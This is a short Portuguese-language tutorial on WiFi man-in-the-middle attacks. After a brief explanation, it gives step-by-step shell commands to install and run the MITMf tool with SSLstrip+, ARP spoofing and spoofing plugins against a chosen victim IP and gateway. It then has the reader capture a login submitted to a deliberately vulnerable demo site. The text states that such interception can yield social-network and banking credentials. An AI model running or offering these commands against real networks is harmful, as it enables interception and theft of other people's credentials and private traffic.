É uma forma de ataque em que os dados trocados entre duas partes são interceptados sem que elas percebam.
Nesse tipo de ataque, o atacante utiliza um ponto de acesso WiFi para interceptar os dados trafegados pela suas vítimas, o que pode ser feito com a utilização de um Roteador WiFi ou através da configuração do notebook do atacante como um Roteador WiFi. Quando o usuário se conecta à rede disponibilizada pelo atacante, todo o tráfego com destino a internet é monitorado pelo atacante sendo possível até mesmo obter credenciais de redes sociais, internet banking e outros dados sigilosos.
-
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
-
git clone https://github.com/hackthreat/MITMF
-
cd MITMF && git submodule init && git submodule update --recursive
-
pip install -r requirements.txt (se o pip não estiver instalado na sua maquina instale usando apt-get install python-pip)
-
python mitmf.py --help (ajuda sobre a execução e parametros do script)
- python mitmf.py --hsts --arp --spoof -i wlan0 --target 192.168.0.10 --gateway 192.168.0.1
- --hsts (Carrega o Plugin SSLstrip +)
- --arp (Redireciona o trafego usando ARP spoofing)
- --spoof (Carrega o Plugin Spoofing)
- -i (seleciona a interface de rede wlan0 para wifi eth0 para rede cabeada)
- --target (informar o ip a ser atacado)
- --gateway (informar o gateway padrão da rede)
- Acessar o site http://testphp.vulnweb.com/login.php
- No campo de Login e Senha informar a senha admin e login admin
- Retornar a maquina onde estamos rodando o MITMF.
- verificar nos logs se foi capturado a senha e login da vitima.